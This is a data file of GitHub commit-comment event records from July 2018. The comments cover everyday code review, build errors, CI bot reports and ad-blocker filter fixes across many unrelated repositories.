{"id":"8009106317","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"kristalls/thinkneticaRoR"},"payload":{"comment":{"id":29811867,"position":2,"line":2,"path":"lesson2/months.rb","commit_id":"92d91dc53c0cb342d4d32e22099cc19a4804ec0e","created_at":"2018-07-24T09:58:04Z","updated_at":"2018-07-24T09:58:04Z","author_association":"NONE","body":"Если блок не занимает больше 100 символов в длинну - его можно написать в одну строку. То есть использовать {} вместо do end"}},"created_at":"2018-07-24T09:58:04Z"}
{"id":"8009106421","type":"CommitCommentEvent","actor":{"login":"ReyAyanami"},"repo":{"name":"osonovaakylai/test"},"payload":{"comment":{"id":29811868,"position":16,"line":18,"path":"src/test/test.js","commit_id":"d23c8d8d6c4de72a2bf8dbb1f4a238b646daca69","created_at":"2018-07-24T09:58:06Z","updated_at":"2018-07-24T09:58:06Z","author_association":"CONTRIBUTOR","body":"also try to use const instead of let"}},"created_at":"2018-07-24T09:58:06Z"}
{"id":"8009109444","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811878,"position":61,"line":61,"path":"index.html","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T09:58:38Z","updated_at":"2018-07-24T09:58:38Z","author_association":"CONTRIBUTOR","body":"エラー時に表示するHTMLもあらかじめ書いておきます。"}},"created_at":"2018-07-24T09:58:38Z"}
{"id":"8009111646","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29811885,"position":null,"line":null,"path":null,"commit_id":"01a48e5d5be6ca9e3d9b071ae63d23e528dfe478","created_at":"2018-07-24T09:59:02Z","updated_at":"2018-07-24T09:59:02Z","author_association":"COLLABORATOR","body":"Puzzle `1186-c29461b2` discovered in   [`src/main/groovy/com/zerocracy/stk/pmo/profile/change_option.groovy`](  https://github.com/zerocracy/farm/blob/master/src/main/groovy/com/zerocracy/stk/pmo/profile/change_option.groovy)   and submitted as #1472. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-24T09:59:02Z"}
{"id":"8009112715","type":"CommitCommentEvent","actor":{"login":"SweeD"},"repo":{"name":"CompanyMood/vue-rangedate-picker"},"payload":{"comment":{"id":29811888,"position":48,"line":72,"path":"src/js/rangedate-picker.js","commit_id":"5a0aaddd95963c0374976b61a96db2ccbf6bd050","created_at":"2018-07-24T09:59:14Z","updated_at":"2018-07-24T09:59:14Z","author_association":"MEMBER","body":"@th1988 did you forget to close `}` here? 😉 "}},"created_at":"2018-07-24T09:59:14Z"}
{"id":"8013397581","type":"CommitCommentEvent","actor":{"login":"dongkoull"},"repo":{"name":"dongkoull/TIL"},"payload":{"comment":{"id":29821728,"position":6,"line":9,"path":"README.md","commit_id":"0ca380679a89d6134c4ebec9e26752637bcbd268","created_at":"2018-07-25T00:00:17Z","updated_at":"2018-07-25T00:00:17Z","author_association":"OWNER","body":"오늘은 쉬는날"}},"created_at":"2018-07-25T00:00:17Z"}
{"id":"8013402694","type":"CommitCommentEvent","actor":{"login":"fokkonaut"},"repo":{"name":"ddnet/ddnet"},"payload":{"comment":{"id":29821746,"position":null,"line":null,"path":null,"commit_id":"d08f03fecf16256b7333855edf617f4b9a6d8466","created_at":"2018-07-25T00:02:04Z","updated_at":"2018-07-25T00:02:04Z","author_association":"CONTRIBUTOR","body":"does this hide other skins than Vanilla from the skin pick menu?"}},"created_at":"2018-07-25T00:02:04Z"}
{"id":"8013409454","type":"CommitCommentEvent","actor":{"login":"hqm"},"repo":{"name":"bsail/rscode"},"payload":{"comment":{"id":29821945,"position":null,"line":null,"path":null,"commit_id":"30c6ac6b802a71d69568184b0338dd055643f61f","created_at":"2018-07-25T00:04:27Z","updated_at":"2018-07-25T00:04:27Z","author_association":"CONTRIBUTOR","body":"Hi, just curious why you got rid of the log table, it will slow down the log function by quite a lot. Are you really really short on memory? \r\n"}},"created_at":"2018-07-25T00:04:27Z"}
{"id":"8013415639","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"harfbuzz/harfbuzz"},"payload":{"comment":{"id":29821961,"position":null,"line":null,"path":null,"commit_id":"62fa7cd1ccff4d4448ef84f9cc146464672636aa","created_at":"2018-07-25T00:06:39Z","updated_at":"2018-07-25T00:06:39Z","author_association":"COLLABORATOR","body":"Should I revert this for now? #539 needs more work."}},"created_at":"2018-07-25T00:06:39Z"}
{"id":"8013416909","type":"CommitCommentEvent","actor":{"login":"cervols"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29821963,"position":42,"line":39,"path":"part2/right_triangle.rb","commit_id":"2a09ccbe90a888ffb6ff4edd0e5424ad47174cf6","created_at":"2018-07-25T00:07:08Z","updated_at":"2018-07-25T00:07:08Z","author_association":"OWNER","body":"хорошее замечание, спасибо :). добавила комментарии и изменила условие для лучшего понимания кода - [последний коммит](https://github.com/cervols/think-a/commit/8129cd190b8ad80f503321e8b62af3cd8beb2740)"}},"created_at":"2018-07-25T00:07:08Z"}
{"id":"8013419161","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29821970,"position":null,"line":null,"path":null,"commit_id":"d60da17bd8d005edd7ef7bf0f1fc76c29306c7cb","created_at":"2018-07-25T00:07:56Z","updated_at":"2018-07-25T00:07:56Z","author_association":"CONTRIBUTOR","body":"Just fyi, `repelis.net##script:inject(abort-on-property-read.js, smrtSB)` prevents `https://jnhwq.25481.online/js/NDQyNzc5.js` from beeing pulled by the inline-script and makes `smrtAdSySBanner` redundant.\r\nYour fix works fine."}},"created_at":"2018-07-25T00:07:56Z"}
{"id":"8013421848","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"v2ray/v2ray-core"},"payload":{"comment":{"id":29821980,"position":null,"line":null,"path":null,"commit_id":"a941ef5392d47d00dee64e9fa51535fdefd53276","created_at":"2018-07-25T00:08:57Z","updated_at":"2018-07-25T00:08:57Z","author_association":"NONE","body":"build on windows\r\n```\r\n# v2ray.com/core/common/buf\r\nwork\\src\\v2ray.com\\core\\common\\buf\\readv_reader.go:12:12: undefined: syscall.Iovec\r\n```"}},"created_at":"2018-07-25T00:08:57Z"}
{"id":"8013424919","type":"CommitCommentEvent","actor":{"login":"theelk801"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":29821988,"position":76,"line":239,"path":"Mage/src/main/java/mage/cards/ExpansionSet.java","commit_id":"79120e7484210ae2aefe006300f3f1873867528b","created_at":"2018-07-25T00:10:03Z","updated_at":"2018-07-25T00:10:03Z","author_association":"CONTRIBUTOR","body":"Gold only exists for Sword of Dungeons and Dragons. I think it should be removed though, I just haven't gotten around to it."}},"created_at":"2018-07-25T00:10:03Z"}
{"id":"8013425281","type":"CommitCommentEvent","actor":{"login":"benjamn"},"repo":{"name":"jquery/esprima"},"payload":{"comment":{"id":29821989,"position":null,"line":null,"path":null,"commit_id":"30602bbdfc355a6a833b985cb163cea477a2975e","created_at":"2018-07-25T00:10:10Z","updated_at":"2018-07-25T00:10:10Z","author_association":"CONTRIBUTOR","body":"I've fixed a specific revision of `graphql-tools` now: https://github.com/benjamn/recast/commit/4663e56d45185efa92b3cc52e3b27046653fd695\r\n\r\nWould you be open to reverting this change, in light of that change? Totally up to you."}},"created_at":"2018-07-25T00:10:10Z"}
{"id":"8013431764","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"Minetron-26/Fly26"},"payload":{"comment":{"id":29822005,"position":null,"line":null,"path":null,"commit_id":"8e260953c085b63076f5414c1f922214cb1394b3","created_at":"2018-07-25T00:12:32Z","updated_at":"2018-07-25T00:12:32Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: .poggit.yml does not contain the 'projects'\nattribute\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/Minetron-26/Fly26/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `6c35f838-8f9f-11e8-9727-9abb91a00aba`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-25T00:12:32Z"}
{"id":"8013432202","type":"CommitCommentEvent","actor":{"login":"ZaphodBeebblebrox"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29822008,"position":null,"line":null,"path":null,"commit_id":"d60da17bd8d005edd7ef7bf0f1fc76c29306c7cb","created_at":"2018-07-25T00:12:41Z","updated_at":"2018-07-25T00:12:41Z","author_association":"MEMBER","body":"Thanks, don't know what I was thinking."}},"created_at":"2018-07-25T00:12:41Z"}
{"id":"8013436160","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29822016,"position":null,"line":null,"path":null,"commit_id":"d60da17bd8d005edd7ef7bf0f1fc76c29306c7cb","created_at":"2018-07-25T00:14:07Z","updated_at":"2018-07-25T00:14:07Z","author_association":"CONTRIBUTOR","body":"The issue is fixed by your filters, so it is no big deal."}},"created_at":"2018-07-25T00:14:07Z"}
{"id":"8013443321","type":"CommitCommentEvent","actor":{"login":"hannabonert"},"repo":{"name":"North-Vine-Engineering/ibs-server"},"payload":{"comment":{"id":29822031,"position":null,"line":null,"path":null,"commit_id":"037ad710681501b5a3c17f021a871695c78a001a","created_at":"2018-07-25T00:16:44Z","updated_at":"2018-07-25T00:16:44Z","author_association":"COLLABORATOR","body":"Sorry, this was a mistake."}},"created_at":"2018-07-25T00:16:44Z"}
{"id":"8013446516","type":"CommitCommentEvent","actor":{"login":"jordanh"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":29822038,"position":5,"line":96,"path":"src/universal/components/ReflectionCard/ReflectionCard.js","commit_id":"1a51b3fcfddcff5e09e717f3c5bbf9acf36de465","created_at":"2018-07-25T00:17:59Z","updated_at":"2018-07-25T00:17:59Z","author_association":"CONTRIBUTOR","body":"I didn't realize flow can catch possible `undefined` references. This is awesome"}},"created_at":"2018-07-25T00:17:59Z"}
{"id":"8013449530","type":"CommitCommentEvent","actor":{"login":"ngodi"},"repo":{"name":"trekhleb/javascript-algorithms"},"payload":{"comment":{"id":29822045,"position":null,"line":null,"path":null,"commit_id":"76c172b20ba10981c9808b29a07d2391e963fda3","created_at":"2018-07-25T00:19:08Z","updated_at":"2018-07-25T00:19:08Z","author_association":"NONE","body":"tvftfLx5Tgttc\nOn Jul 23, 2018 2:00 PM, \"Nicolas DUBIEN\" <notifications@github.com> wrote:\n\n> Oh, so sorry I should have updated the documentation accordingly :)\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/trekhleb/javascript-algorithms/commit/76c172b20ba10981c9808b29a07d2391e963fda3#commitcomment-29799877>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APnG7BN1wOcvKdzbO_3cSAg8f0vbZB3tks5uJcjagaJpZM4Va8pY>\n> .\n>\n"}},"created_at":"2018-07-25T00:19:08Z"}
{"id":"8013449944","type":"CommitCommentEvent","actor":{"login":"Keno"},"repo":{"name":"staticfloat/GlibcBuilder"},"payload":{"comment":{"id":29822046,"position":null,"line":null,"path":null,"commit_id":"1072301f4b075cd3fcc44bbd59ab7d3539cff2b4","created_at":"2018-07-25T00:19:16Z","updated_at":"2018-07-25T00:19:16Z","author_association":"NONE","body":"Ah, sorry, I had this patch locally:\r\n```\r\n mkdir -p $WORKSPACE/srcdir/glibc_build\r\n cd $WORKSPACE/srcdir/glibc_build\r\n-$WORKSPACE/srcdir/glibc-*/configure --prefix=${prefix} \\\r\n+$WORKSPACE/srcdir/glibc-*/configure --prefix=/usr \\\r\n        --host=${target} \\\r\n        --with-headers=\"${sysroot}/usr/include\" \\\r\n        --disable-multilib \\\r\n@@ -128,7 +130,7 @@ $WORKSPACE/srcdir/glibc-*/configure --prefix=${prefix} \\\r\n        libc_cv_c_cleanup=yes\r\n\r\n make -j${nproc}\r\n-make install\r\n+make install install_root=${sysroot}\r\n \"\"\"\r\n```\r\nDo you think both are needed?"}},"created_at":"2018-07-25T00:19:16Z"}
{"id":"8013450587","type":"CommitCommentEvent","actor":{"login":"soliemad"},"repo":{"name":"YassSoliman/chatroom-project"},"payload":{"comment":{"id":29822048,"position":null,"line":null,"path":null,"commit_id":"87fdf813f4c0a92285f1f7cd722d032f29ce1876","created_at":"2018-07-25T00:19:33Z","updated_at":"2018-07-25T00:19:33Z","author_association":"COLLABORATOR","body":"Reasoning:\r\nThe user is connected to the socket before entering their name. This means they still recieves Broadcats (chat) from everyone else. Bocause of that, loading history on name entry is no good so it should be loaded on connect. \r\n\r\nTo test:\r\n1. If User looses connection and keeps page loaded (might reload history since reconnect)\r\na.this could be solved by clearing chat when loading history but i want to make sure it is an issue. I could not make it happen since localhost\r\n\r\nIf the server shuts down or restarts while people are connected, the history witll be empty and the user will load an empty history."}},"created_at":"2018-07-25T00:19:33Z"}
{"id":"8013451113","type":"CommitCommentEvent","actor":{"login":"pouchak"},"repo":{"name":"pouchak/rainbows-end-api"},"payload":{"comment":{"id":29822050,"position":null,"line":null,"path":null,"commit_id":"f21f218804f01f05ed5cd1facb42f795a0c2113f","created_at":"2018-07-25T00:19:45Z","updated_at":"2018-07-25T00:19:45Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add JSDoc to Rainbow's End API project](https://trello.com/c/O1GFiR60/3-add-jsdoc-to-rainbows-end-api-project)"}},"created_at":"2018-07-25T00:19:45Z"}
{"id":"8013451229","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29822051,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-25T00:19:48Z","updated_at":"2018-07-25T00:19:48Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-25T00:19:48Z"}
{"id":"8013454131","type":"CommitCommentEvent","actor":{"login":"mmdnetwork"},"repo":{"name":"mmdnetwork/occupythetrees.com"},"payload":{"comment":{"id":29822059,"position":null,"line":null,"path":null,"commit_id":"63d1ab3da42b33f2234810b1af390f41ae195874","created_at":"2018-07-25T00:20:54Z","updated_at":"2018-07-25T00:20:54Z","author_association":"OWNER","body":"Added 5 upcoming events all with near perfect SEO (Some of the content is below the 300 word minimum but that's okay)"}},"created_at":"2018-07-25T00:20:54Z"}
{"id":"8013456700","type":"CommitCommentEvent","actor":{"login":"muhammad-younis"},"repo":{"name":"Nitish-Squad/CookingApp"},"payload":{"comment":{"id":29822062,"position":null,"line":null,"path":null,"commit_id":"092eba99986b016945681536716ad8e2056b2995","created_at":"2018-07-25T00:21:53Z","updated_at":"2018-07-25T00:21:53Z","author_association":"NONE","body":"got rid of it because I deleted the key from my google account"}},"created_at":"2018-07-25T00:21:53Z"}
{"id":"8013456774","type":"CommitCommentEvent","actor":{"login":"av8ramit"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29822063,"position":null,"line":null,"path":null,"commit_id":"e33056b35709d9f26f4a13762bc8eddd3bd3eef8","created_at":"2018-07-25T00:21:55Z","updated_at":"2018-07-25T00:21:55Z","author_association":"MEMBER","body":"We were running into this error `from . import py31compat ImportError: cannot import name py31compat`"}},"created_at":"2018-07-25T00:21:55Z"}
{"id":"8013457311","type":"CommitCommentEvent","actor":{"login":"Valdjr"},"repo":{"name":"Valdjr/erp-vulcan"},"payload":{"comment":{"id":29822065,"position":null,"line":null,"path":null,"commit_id":"01370f6f8a40b6b7feaa4b2743ba315cb5c189cd","created_at":"2018-07-25T00:22:08Z","updated_at":"2018-07-25T00:22:08Z","author_association":"OWNER","body":"Ajuste para que a query do dashboardConselho consiga trazer empresas que não efetuaram vendas ainda também"}},"created_at":"2018-07-25T00:22:08Z"}
{"id":"8013477855","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822132,"position":null,"line":null,"path":null,"commit_id":"be084e58412bdf2bdbf80b9782ac4314efac7358","created_at":"2018-07-25T00:30:07Z","updated_at":"2018-07-25T00:30:07Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be084e58412bdf2bdbf80b9782ac4314efac7358-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a>  \n"}},"created_at":"2018-07-25T00:30:07Z"}
{"id":"8013480021","type":"CommitCommentEvent","actor":{"login":"jdschwam"},"repo":{"name":"jdschwam/akobetest"},"payload":{"comment":{"id":29822137,"position":null,"line":null,"path":null,"commit_id":"8c01b0b3bf08894d18f465d3e42680f2878d1c2d","created_at":"2018-07-25T00:30:52Z","updated_at":"2018-07-25T00:30:52Z","author_association":"OWNER","body":"Created multidev environment [akobetest#ci-2](https://dashboard.pantheon.io/sites/0475cad5-1871-4557-8e71-fe28909fc94d#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-akobetest.pantheonsite.io/)"}},"created_at":"2018-07-25T00:30:52Z"}
{"id":"8013480273","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29822138,"position":null,"line":null,"path":null,"commit_id":"86e82ae95d1aa90c99c75d6d3f1a635a5c1c062a","created_at":"2018-07-25T00:30:57Z","updated_at":"2018-07-25T00:30:57Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/86e82ae95d1aa90c99c75d6d3f1a635a5c1c062a)\n\nBuilt at __20180725 - 00:30:57__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 571s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 809s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/coverage.txt) | 1035 cases, 0 failed, t: 698s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 236s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 497s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 123s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1231s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 341s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 356s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/22//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 517s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-25T00:30:57Z"}
{"id":"8013481660","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29822143,"position":null,"line":null,"path":null,"commit_id":"e6c991b963fd78924a40be90b4a6578d07894ad1","created_at":"2018-07-25T00:31:30Z","updated_at":"2018-07-25T00:31:30Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-536](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-536).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-536-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-25T00:31:30Z"}
{"id":"8013483491","type":"CommitCommentEvent","actor":{"login":"quercitron"},"repo":{"name":"magefree/mage"},"payload":{"comment":{"id":29822149,"position":76,"line":239,"path":"Mage/src/main/java/mage/cards/ExpansionSet.java","commit_id":"79120e7484210ae2aefe006300f3f1873867528b","created_at":"2018-07-25T00:32:12Z","updated_at":"2018-07-25T00:32:12Z","author_association":"CONTRIBUTOR","body":"I also think that gold color should be removed. It's not a part of official magic rules and confused me a lot at first."}},"created_at":"2018-07-25T00:32:12Z"}
{"id":"8013485751","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":29822154,"position":153,"line":419,"path":"src/main/java/com/gmail/nossr50/skills/fishing/FishingManager.java","commit_id":"0a1559511a4f20169246e98a6565d388a0c8adac","created_at":"2018-07-25T00:33:02Z","updated_at":"2018-07-25T00:33:02Z","author_association":"CONTRIBUTOR","body":"If you'd like something a little more foolproof, vanilla Minecraft now has \"tags\" which group items since items that used to be grouped by sharing an ID have been separated. [Bukkit Tag.java here](https://hub.spigotmc.org/stash/projects/SPIGOT/repos/bukkit/browse/src/main/java/org/bukkit/Tag.java)."}},"created_at":"2018-07-25T00:33:02Z"}
{"id":"8013494527","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":29822171,"position":148,"line":159,"path":"src/main/java/com/gmail/nossr50/skills/mining/Mining.java","commit_id":"0a1559511a4f20169246e98a6565d388a0c8adac","created_at":"2018-07-25T00:36:27Z","updated_at":"2018-07-25T00:36:27Z","author_association":"CONTRIBUTOR","body":"Glazed Terracotta essentially doesn't generate naturally so  I'm not sure it makes sense to apply double drops to it in either case here (both silk touch and for mining). The only ones that generate as part of the landscape are normal dyed (unglazed) terracotta in mesas."}},"created_at":"2018-07-25T00:36:27Z"}
{"id":"8013495641","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MEWconnect-landing-page"},"payload":{"comment":{"id":29822173,"position":null,"line":null,"path":null,"commit_id":"4c0bd0f4d1d5456632bb101209c67f5ff42dbc40","created_at":"2018-07-25T00:36:53Z","updated_at":"2018-07-25T00:36:53Z","author_association":"NONE","body":"Copy of this build can be found at https://mewc.mewbuilds.com/build/4c0bd0f4d1d5456632bb101209c67f5ff42dbc40/index.html"}},"created_at":"2018-07-25T00:36:53Z"}
{"id":"8013498552","type":"CommitCommentEvent","actor":{"login":"31m059"},"repo":{"name":"VoyagerOne/Stockfish"},"payload":{"comment":{"id":29822179,"position":null,"line":null,"path":null,"commit_id":"c5e114ab1ad17816665ddc3e22afb2a41c68144a","created_at":"2018-07-25T00:38:04Z","updated_at":"2018-07-25T00:38:04Z","author_association":"NONE","body":"Congratulations!"}},"created_at":"2018-07-25T00:38:04Z"}
{"id":"8013499120","type":"CommitCommentEvent","actor":{"login":"wongsyrone"},"repo":{"name":"v2ray/v2ray-core"},"payload":{"comment":{"id":29822182,"position":null,"line":null,"path":null,"commit_id":"a941ef5392d47d00dee64e9fa51535fdefd53276","created_at":"2018-07-25T00:38:18Z","updated_at":"2018-07-25T00:38:18Z","author_association":"NONE","body":"I checked golang sources in `syscall/types_{GOOS}.go`, Windows doesn't have Iovec, I tried to fix the issue by adding conditional build directive `// +build !windows` in readv_reader.go. Another error appears:\r\n\r\n```\r\n# v2ray.com/core/common/buf\r\nwork\\src\\v2ray.com\\core\\common\\buf\\io.go:76:12: undefined: NewReadVReader\r\n```\r\nI suggest dropping useReadv condition and make it default on the supported platforms."}},"created_at":"2018-07-25T00:38:18Z"}
{"id":"8013499771","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29822187,"position":null,"line":null,"path":null,"commit_id":"85774f230b3d28f6b306e8e0a279a95af6cb82de","created_at":"2018-07-25T00:38:34Z","updated_at":"2018-07-25T00:38:34Z","author_association":"NONE","body":"159149473-Bug-in-surface-dot/cross-product-calculation-#6834 (lgu1234) - Win64-Windows-7-VisualStudio-14: OK (2944 of 2944 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-85774f230b3d28f6b306e8e0a279a95af6cb82de-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-25T00:38:34Z"}
{"id":"8013500910","type":"CommitCommentEvent","actor":{"login":"andersonlisboar"},"repo":{"name":"andersonlisboar/lecture00"},"payload":{"comment":{"id":29822191,"position":null,"line":null,"path":null,"commit_id":"3e1e395d7b27d74480d4b3b691f399ff33253fe7","created_at":"2018-07-25T00:39:02Z","updated_at":"2018-07-25T00:39:02Z","author_association":"OWNER","body":"Delete"}},"created_at":"2018-07-25T00:39:02Z"}
{"id":"8013502518","type":"CommitCommentEvent","actor":{"login":"pmarks"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29822196,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-25T00:39:39Z","updated_at":"2018-07-25T00:39:39Z","author_association":"CONTRIBUTOR","body":"Can you do a quick test with a println and see if it's giving you the right value?  I'm pretty sure it will, because the traits in use don't give us any way to get access the Node::len() function. So I'm pretty sure we're getting the ExactSizeIterator::len() function, which should give us the right value."}},"created_at":"2018-07-25T00:39:39Z"}
{"id":"8013502865","type":"CommitCommentEvent","actor":{"login":"TheBentoBox"},"repo":{"name":"mcMMO-Dev/mcMMO"},"payload":{"comment":{"id":29822198,"position":144,"line":235,"path":"src/main/java/com/gmail/nossr50/util/BlockUtils.java","commit_id":"0a1559511a4f20169246e98a6565d388a0c8adac","created_at":"2018-07-25T00:39:47Z","updated_at":"2018-07-25T00:39:47Z","author_association":"CONTRIBUTOR","body":"Same here as what I mentioned with the wool since leaves also have a tag that contains all of them which should be future proof should more leaves be added."}},"created_at":"2018-07-25T00:39:47Z"}
